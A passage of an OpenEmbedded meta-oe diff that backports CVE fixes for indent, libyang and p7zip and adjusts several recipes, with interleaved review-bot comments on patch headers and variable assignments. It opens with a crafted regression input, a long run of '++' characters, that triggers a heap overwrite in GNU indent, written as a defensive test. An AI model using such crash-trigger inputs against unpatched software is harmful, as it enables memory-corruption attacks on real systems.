++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 
++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ */ ++ { +diff --git a/regression/standard/comment-heap-overwrite.err b/regression/standard/comment-heap-overwrite.err +new file mode 100644 +index 0000000..fa571c8 +--- /dev/null ++++ b/regression/standard/comment-heap-overwrite.err +@@ -0,0 +1 @@ ++indent: input/comment-heap-overwrite.c:2044: Error:Unexpected end of file +diff --git a/src/indent.c b/src/indent.c +index 208b48a..a9f88a2 100644 +--- a/src/indent.c ++++ b/src/indent.c +@@ -228,6 +228,7 @@ static BOOLEAN search_brace( + * a `dump_line' 
call, thus ensuring that the brace + * will go into the right column. */ + ++ need_chars (&save_com, 2); + *save_com.end++ = EOL; + *save_com.end++ = '{'; + save_com.len += 2; +-- +2.35.5 diff --git a/meta-oe/recipes-extended/indent/indent_2.2.12.bb b/meta-oe/recipes-extended/indent/indent_2.2.12.bb index 1a7d61abc0..a846682c13 100644 --- a/meta-oe/recipes-extended/indent/indent_2.2.12.bb +++ b/meta-oe/recipes-extended/indent/indent_2.2.12.bb @@ -17,6 +17,8 @@ SRC_URI = "${GNU_MIRROR}/${BPN}/${BP}.tar.gz \ file://0001-Makefile.am-remove-regression-dir.patch \ file://0001-Fix-builds-with-recent-gettext.patch \ file://0001-Remove-dead-paren_level-code.patch \ + file://CVE-2023-40305_0001.patch \ + file://CVE-2023-40305_0002.patch \ " SRC_URI[md5sum] = "4764b6ac98f6654a35da117b8e5e8e14" SRC_URI[sha256sum] = "e77d68c0211515459b8812118d606812e300097cfac0b4e9fb3472664263bb8b" diff --git a/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb b/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb index d6e56ea768..edc5e00f52 100644 --- a/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb +++ b/meta-oe/recipes-extended/jansson/jansson_2.13.1.bb @@ -11,4 +11,7 @@ SRC_URI[sha256sum] = "f4f377da17b10201a60c1108613e78ee15df6b12016b116b6de42209f4 inherit autotools pkgconfig +# upstream considers it isn't a real bug https://github.com/akheron/jansson/issues/548 +CVE_CHECK_IGNORE = "CVE-2020-36325 " + BBCLASSEXTEND = "native" diff --git a/meta-oe/recipes-extended/liblockfile/liblockfile/0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch b/meta-oe/recipes-extended/liblockfile/liblockfile/0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch new file mode 100644 index 0000000000..8ac61aa55d --- /dev/null +++ b/meta-oe/recipes-extended/liblockfile/liblockfile/0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch 
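Review bot: The added `CVE_CHECK_IGNORE = "CVE-2020-36325 "` in jansson_2.13.1.bb uses plain assignment, which replaces whatever the variable already holds for this recipe (for example entries supplied by a distro-wide exclusion include, if one is in use) instead of extending it. Appending keeps earlier entries intact: `CVE_CHECK_IGNORE += "CVE-2020-36325"`. The trailing space inside the quotes is not needed. The comment with the upstream issue link directly above the entry is the right place for the justification and should stay.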
@@ -0,0 +1,63 @@ +From db9b4be854bb9a84319b81ce0afecd98f4f84ff7 Mon Sep 17 00:00:00 2001 +From: Changqing Li <changqing.li@windriver.com> +Date: Mon, 27 Feb 2023 08:28:21 +0000 +Subject: [PATCH] Makefile.in: fix install failure on host without ldconfig + +fix syntax error when ldconfig is not installed on host + +when ldconfig is not installed on the build host, install will failed with +error: +ln -sf nfslock.so.0.1 /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/lib64/nfslock.so.0 +install -m 644 lockfile.h maillock.h /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/include +if test "/mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image" = ""; then ; fi +if [ "mail" != "" ]; then\ + install -g mail -m 2755 dotlockfile /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/bin;\ + else \ + install -g root -m 755 dotlockfile /mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image/usr/bin; \ + fi +/bin/sh: -c: line 1: syntax error near unexpected token `;' +/bin/sh: -c: line 1: `if test "/mnt/tmp-glibc/work/core2-64-wrs-linux/liblockfile/1.14-r0/image" = ""; then ; fi' + +Upstream-Status: Submitted [https://github.com/miquels/liblockfile/pull/21] + +Signed-off-by: Changqing Li <changqing.li@windriver.com> +--- + Makefile.in | 8 ++++++-- + 1 file changed, 6 insertions(+), 2 deletions(-) + +diff --git a/Makefile.in b/Makefile.in +index 6e53179..d003899 100644 +--- a/Makefile.in ++++ b/Makefile.in +@@ -9,6 +9,10 @@ NFSVER = 0.1 + CFLAGS = @CFLAGS@ -I. 
+ LDFLAGS = @LDFLAGS@ + CC = @CC@ ++LDCONFIG = @LDCONFIG@ ++ifeq ($(LDCONFIG),) ++ LDCONFIG = ":" ++endif + + prefix = $(DESTDIR)@prefix@ + exec_prefix = @exec_prefix@ +@@ -58,7 +62,7 @@ install_shared: shared install_static install_common + $(libdir)/liblockfile.so.$(SOVER) + ln -s liblockfile.so.$(SOVER) $(libdir)/liblockfile.so.$(MAJOR) + ln -s liblockfile.so.$(SOVER) $(libdir)/liblockfile.so +- if test "$(DESTDIR)" = ""; then @LDCONFIG@; fi ++ if test "$(DESTDIR)" = ""; then $(LDCONFIG); fi + + install_common: + install -d -m 755 -g root -p $(includedir) +@@ -79,7 +83,7 @@ install_nfslib: nfslib + install -m 755 nfslock.so.$(NFSVER) $(nfslockdir) + ln -sf nfslock.so.$(NFSVER) $(libdir)/nfslock.so + ln -sf nfslock.so.$(NFSVER) $(libdir)/nfslock.so.0 +- if test "$(DESTDIR)" = ""; then @LDCONFIG@; fi ++ if test "$(DESTDIR)" = ""; then $(LDCONFIG); fi + + clean: + rm -f *.a *.o *.so *.so.* dotlockfile +-- +2.25.1 + diff --git a/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb b/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb index bac3a2c0bd..eefc25dc46 100644 --- a/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb +++ b/meta-oe/recipes-extended/liblockfile/liblockfile_1.14.bb @@ -10,6 +10,7 @@ SRC_URI = "${DEBIAN_MIRROR}/main/libl/liblockfile/liblockfile_1.14.orig.tar.gz \ file://0001-Makefile.in-add-DESTDIR.patch \ file://0001-Makefile.in-install-nfslock-libs.patch \ file://liblockfile-fix-install-so-to-man-dir.patch \ + file://0001-Makefile.in-fix-install-failure-on-host-without-ldco.patch \ " SRC_URI[md5sum] = "420c056ba0cc4d1477e402f70ba2f5eb" diff --git a/meta-oe/recipes-extended/libqb/libqb_2.0.6.bb b/meta-oe/recipes-extended/libqb/libqb_2.0.8.bb index ce3606d777..3db9e2e66f 100644 --- a/meta-oe/recipes-extended/libqb/libqb_2.0.6.bb +++ b/meta-oe/recipes-extended/libqb/libqb_2.0.8.bb 
@@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=321bf41f280cf805086dd5a720b37785" inherit autotools pkgconfig -SRCREV = "758044bed5f615c90818aa5431d00303288888e5" +SRCREV = "002171bbcf4bc4728da56c1538afd9e9d814ecaf" SRC_URI = "git://github.com/ClusterLabs/${BPN}.git;branch=main;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26916.patch b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26916.patch new file mode 100644 index 0000000000..f3af3dbffd --- /dev/null +++ b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26916.patch 
@@ -0,0 +1,57 @@ +From dc668d296f9f05aeab6315d44cff3208641e3096 Mon Sep 17 00:00:00 2001 +From: Michal Vasko <mvasko@cesnet.cz> +Date: Mon, 13 Feb 2023 10:23:13 +0100 +Subject: [PATCH] schema compile UPDATE do not implement 2 same modules + +CVE: CVE-2023-26916 +Upstream-Status: Backport [https://github.com/CESNET/libyang/commit/dc668d296f9f05aeab6315d44cff3208641e3096] + +Refs #1979 +--- + src/schema_compile.c | 20 +++++++------------- + 1 file changed, 7 insertions(+), 13 deletions(-) + +diff --git a/src/schema_compile.c b/src/schema_compile.c +index ed768ba0..68c0d681 100644 +--- a/src/schema_compile.c ++++ b/src/schema_compile.c +@@ -1748,7 +1748,7 @@ lys_has_compiled_import_r(struct lys_module *mod) + LY_ERR + lys_implement(struct lys_module *mod, const char **features, struct lys_glob_unres *unres) + { +- LY_ERR ret; ++ LY_ERR r; + struct lys_module *m; + + assert(!mod->implemented); +@@ -1757,21 +1757,15 @@ lys_implement(struct lys_module *mod, const char **features, struct lys_glob_unr + m = ly_ctx_get_module_implemented(mod->ctx, mod->name); + if (m) { + assert(m != mod); +- if (!strcmp(mod->name, "yang") && (strcmp(m->revision, mod->revision) > 0)) { +- /* special case for newer internal module, continue */ +- LOGVRB("Internal module \"%s@%s\" is already implemented in revision \"%s\", using it instead.", +- mod->name, mod->revision ? mod->revision : "<none>", m->revision ? m->revision : "<none>"); +- } else { +- LOGERR(mod->ctx, LY_EDENIED, "Module \"%s@%s\" is already implemented in revision \"%s\".", +- mod->name, mod->revision ? mod->revision : "<none>", m->revision ? m->revision : "<none>"); +- return LY_EDENIED; +- } ++ LOGERR(mod->ctx, LY_EDENIED, "Module \"%s@%s\" is already implemented in revision \"%s\".", ++ mod->name, mod->revision ? mod->revision : "<none>", m->revision ? 
m->revision : "<none>"); ++ return LY_EDENIED; + } + + /* set features */ +- ret = lys_set_features(mod->parsed, features); +- if (ret && (ret != LY_EEXIST)) { +- return ret; ++ r = lys_set_features(mod->parsed, features); ++ if (r && (r != LY_EEXIST)) { ++ return r; + } + + /* +-- +2.34.1 + diff --git a/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26917.patch b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26917.patch new file mode 100644 index 0000000000..d7ba2fb9a0 --- /dev/null +++ b/meta-oe/recipes-extended/libyang/libyang/CVE-2023-26917.patch @@ -0,0 +1,40 @@ +From cfa1a965a429e4bfc5ae1539a8e87a9cf71c3090 Mon Sep 17 00:00:00 2001 +From: Michal Vasko <mvasko@cesnet.cz> +Date: Tue, 18 Jul 2023 10:41:21 +0000 +Subject: [PATCH] parser common BUGFIX handle missing YANG strings + +Fixes #1987 + +CVE: CVE-2023-26917 + +Upstream-Status: +Backport[https://github.com/CESNET/libyang/commit/cfa1a965a429e4bfc5ae1539a8e87a9cf71c3090] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/parser_stmt.c | 10 ++++++++++ + 1 file changed, 10 insertions(+) + +diff --git a/src/parser_stmt.c b/src/parser_stmt.c +index 81ccbfca6..2ebf822ab 100644 +--- a/src/parser_stmt.c ++++ b/src/parser_stmt.c +@@ -52,6 +52,16 @@ lysp_stmt_validate_value(struct lys_parser_ctx *ctx, enum yang_arg val_type, con + uint32_t c; + size_t utf8_char_len; + ++ if (!val) { ++ if (val_type == Y_MAYBE_STR_ARG) { ++ /* fine */ ++ return LY_SUCCESS; ++ } ++ ++ LOGVAL_PARSER(ctx, LYVE_SYNTAX, "Missing an expected string."); ++ return LY_EVALID; ++ } ++ + while (*val) { + LY_CHECK_ERR_RET(ly_getutf8(&val, &c, &utf8_char_len), + LOGVAL_PARSER(ctx, LY_VCODE_INCHAR, (val)[-utf8_char_len]), LY_EVALID); +-- +2.35.5 diff --git a/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb b/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb index 2817be7c86..eb3f322519 100644 --- a/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb +++ b/meta-oe/recipes-extended/libyang/libyang_2.0.164.bb 
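Review bot: The header of CVE-2023-26916.patch carries `CVE:` and `Upstream-Status:` but no `Signed-off-by:` from whoever prepared the backport, unlike the other patch files added in this commit. Add one below the `Upstream-Status:` line, `Signed-off-by: <backporter name and address>`. The backport also keeps upstream's unrelated rename of `ret` to `r` in `lys_implement`, so a sentence in the header stating that the fix is the removal of the "yang" special-case branch would make later rebases easier to audit. `lys_implement` continues outside the inner hunk.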
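Review bot: The `Upstream-Status:` tag in CVE-2023-26917.patch is split over two lines and has no space before the bracket (`Upstream-Status:` followed by `Backport[https://...]` on the next line), so patch-status tooling that reads the tag from a single line is likely to see an empty or malformed status. Put it on one line: `Upstream-Status: Backport [https://github.com/CESNET/libyang/commit/cfa1a965a429e4bfc5ae1539a8e87a9cf71c3090]`. The code change itself adds the `!val` guard before the `while (*val)` loop in `lysp_stmt_validate_value`, whose body continues outside the inner hunk.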
@@ -11,6 +11,8 @@ SRCREV = "a0cc89516ab5eca84d01c85309f320a94752a64c" SRC_URI = "git://github.com/CESNET/libyang.git;branch=master;protocol=https \ file://libyang-add-stdint-h.patch \ file://run-ptest \ + file://CVE-2023-26916.patch \ + file://CVE-2023-26917.patch \ " S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb b/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb index af0a3c2bd2..6801020ef9 100644 --- a/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb +++ b/meta-oe/recipes-extended/openwsman/openwsman_2.6.11.bb @@ -17,7 +17,7 @@ REQUIRED_DISTRO_FEATURES = "pam" SRCREV = "d8eba6cb6682b59d84ca1da67a523520b879ade6" -SRC_URI = "git://github.com/Openwsman/openwsman.git;branch=master;protocol=https \ +SRC_URI = "git://github.com/Openwsman/openwsman.git;branch=main;protocol=https \ file://libssl-is-required-if-eventint-supported.patch \ file://openwsmand.service \ file://0001-lock.c-Define-PTHREAD_MUTEX_RECURSIVE_NP-if-undefine.patch \ diff --git a/meta-oe/recipes-extended/p7zip/files/CVE-2016-9296.patch b/meta-oe/recipes-extended/p7zip/files/CVE-2016-9296.patch new file mode 100644 index 0000000000..42ea716bea --- /dev/null +++ b/meta-oe/recipes-extended/p7zip/files/CVE-2016-9296.patch 
@@ -0,0 +1,30 @@ +From: Robert Luberda <robert@debian.org> +Date: Sat, 19 Nov 2016 08:48:08 +0100 +Subject: Fix nullptr dereference (CVE-2016-9296) + +Patch taken from https://sourceforge.net/p/p7zip/bugs/185/ + +CVE: CVE-2016-9296 + +Upstream-Status: Backport [https://snapshot.debian.org/archive/debian-debug/20180205T215659Z/pool/main/p/p7zip/p7zip_16.02%2Bdfsg-6.debian.tar.xz] + +Signed-off-by: Zahir Hussain <zahir.basha@kpit.com> +Signed-off-by: aszh07 <mail2szahir@gmail.com> +--- + CPP/7zip/Archive/7z/7zIn.cpp | 3 ++- + 1 file changed, 2 insertions(+), 1 deletion(-) + +diff --git a/CPP/7zip/Archive/7z/7zIn.cpp b/CPP/7zip/Archive/7z/7zIn.cpp +index b0c6b98..7c6dde2 100644 +--- a/CPP/7zip/Archive/7z/7zIn.cpp ++++ b/CPP/7zip/Archive/7z/7zIn.cpp +@@ -1097,7 +1097,8 @@ HRESULT CInArchive::ReadAndDecodePackedStreams( + if (CrcCalc(data, unpackSize) != folders.FolderCRCs.Vals[i]) + ThrowIncorrect(); + } +- HeadersSize += folders.PackPositions[folders.NumPackStreams]; ++ if (folders.PackPositions) ++ HeadersSize += folders.PackPositions[folders.NumPackStreams]; + return S_OK; + } + diff --git a/meta-oe/recipes-extended/p7zip/files/CVE-2018-5996.patch b/meta-oe/recipes-extended/p7zip/files/CVE-2018-5996.patch new file mode 100644 index 0000000000..6b337b8d2d --- /dev/null +++ b/meta-oe/recipes-extended/p7zip/files/CVE-2018-5996.patch 
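Review bot: The new `if (folders.PackPositions)` guard in `CInArchive::ReadAndDecodePackedStreams` skips the `HeadersSize` update without saying when the table can be absent. Presumably it is left unallocated when the archive supplies no pack-stream information, but that is not visible in this hunk. A one-line comment above the guard would record the reason, e.g. `// PackPositions is null when no pack info was read (CVE-2016-9296); nothing to add then`. The function starts outside the hunk, so whether other reads of `folders.PackPositions` in it need the same guard cannot be checked from here.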
@@ -0,0 +1,228 @@ +From: Robert Luberda <robert@debian.org> +Date: Sun, 28 Jan 2018 23:47:40 +0100 +Subject: CVE-2018-5996 + +Hopefully fix Memory Corruptions via RAR PPMd (CVE-2018-5996) by +applying a few changes from 7Zip 18.00-beta. + +Bug-Debian: https://bugs.debian.org/#888314 + +CVE: CVE-2018-5996 + +Upstream-Status: Backport [https://sources.debian.org/data/non-free/p/p7zip-rar/16.02-3/debian/patches/06-CVE-2018-5996.patch] + +Signed-off-by: Zahir Hussain <zahir.basha@kpit.com> +Signed-off-by: aszh07 <mail2szahir@gmail.com> +--- + CPP/7zip/Compress/Rar1Decoder.cpp | 13 +++++++++---- + CPP/7zip/Compress/Rar1Decoder.h | 1 + + CPP/7zip/Compress/Rar2Decoder.cpp | 10 +++++++++- + CPP/7zip/Compress/Rar2Decoder.h | 1 + + CPP/7zip/Compress/Rar3Decoder.cpp | 23 ++++++++++++++++++++--- + CPP/7zip/Compress/Rar3Decoder.h | 2 ++ + 6 files changed, 42 insertions(+), 8 deletions(-) + +diff --git a/CPP/7zip/Compress/Rar1Decoder.cpp b/CPP/7zip/Compress/Rar1Decoder.cpp +index 1aaedcc..68030c7 100644 +--- a/CPP/7zip/Compress/Rar1Decoder.cpp ++++ b/CPP/7zip/Compress/Rar1Decoder.cpp +@@ -29,7 +29,7 @@ public: + }; + */ + +-CDecoder::CDecoder(): m_IsSolid(false) { } ++CDecoder::CDecoder(): m_IsSolid(false), _errorMode(false) { } + + void CDecoder::InitStructures() + { +@@ -406,9 +406,14 @@ HRESULT CDecoder::CodeReal(ISequentialInStream *inStream, ISequentialOutStream * + InitData(); + if (!m_IsSolid) + { ++ _errorMode = false; + InitStructures(); + InitHuff(); + } ++ ++ if (_errorMode) ++ return S_FALSE; ++ + if (m_UnpackSize > 0) + { + GetFlagsBuf(); +@@ -477,9 +482,9 @@ STDMETHODIMP CDecoder::Code(ISequentialInStream *inStream, ISequentialOutStream + const UInt64 *inSize, const UInt64 *outSize, ICompressProgressInfo *progress) + { + try { return CodeReal(inStream, outStream, inSize, outSize, progress); } +- catch(const CInBufferException &e) { return e.ErrorCode; } +- catch(const CLzOutWindowException &e) { return e.ErrorCode; } +- catch(...) 
{ return S_FALSE; } ++ catch(const CInBufferException &e) { _errorMode = true; return e.ErrorCode; } ++ catch(const CLzOutWindowException &e) { _errorMode = true; return e.ErrorCode; } ++ catch(...) { _errorMode = true; return S_FALSE; } + } + + STDMETHODIMP CDecoder::SetDecoderProperties2(const Byte *data, UInt32 size) +diff --git a/CPP/7zip/Compress/Rar1Decoder.h b/CPP/7zip/Compress/Rar1Decoder.h +index 630f089..01b606b 100644 +--- a/CPP/7zip/Compress/Rar1Decoder.h ++++ b/CPP/7zip/Compress/Rar1Decoder.h +@@ -39,6 +39,7 @@ public: + + Int64 m_UnpackSize; + bool m_IsSolid; ++ bool _errorMode; + + UInt32 ReadBits(int numBits); + HRESULT CopyBlock(UInt32 distance, UInt32 len); +diff --git a/CPP/7zip/Compress/Rar2Decoder.cpp b/CPP/7zip/Compress/Rar2Decoder.cpp +index b3f2b4b..0580c8d 100644 +--- a/CPP/7zip/Compress/Rar2Decoder.cpp ++++ b/CPP/7zip/Compress/Rar2Decoder.cpp +@@ -80,7 +80,8 @@ static const UInt32 kHistorySize = 1 << 20; + static const UInt32 kWindowReservSize = (1 << 22) + 256; + + CDecoder::CDecoder(): +- m_IsSolid(false) ++ m_IsSolid(false), ++ m_TablesOK(false) + { + } + +@@ -100,6 +101,8 @@ UInt32 CDecoder::ReadBits(unsigned numBits) { return m_InBitStream.ReadBits(numB + + bool CDecoder::ReadTables(void) + { ++ m_TablesOK = false; ++ + Byte levelLevels[kLevelTableSize]; + Byte newLevels[kMaxTableSize]; + m_AudioMode = (ReadBits(1) == 1); +@@ -170,6 +173,8 @@ bool CDecoder::ReadTables(void) + } + + memcpy(m_LastLevels, newLevels, kMaxTableSize); ++ m_TablesOK = true; ++ + return true; + } + +@@ -344,6 +349,9 @@ HRESULT CDecoder::CodeReal(ISequentialInStream *inStream, ISequentialOutStream * + return S_FALSE; + } + ++ if (!m_TablesOK) ++ return S_FALSE; ++ + UInt64 startPos = 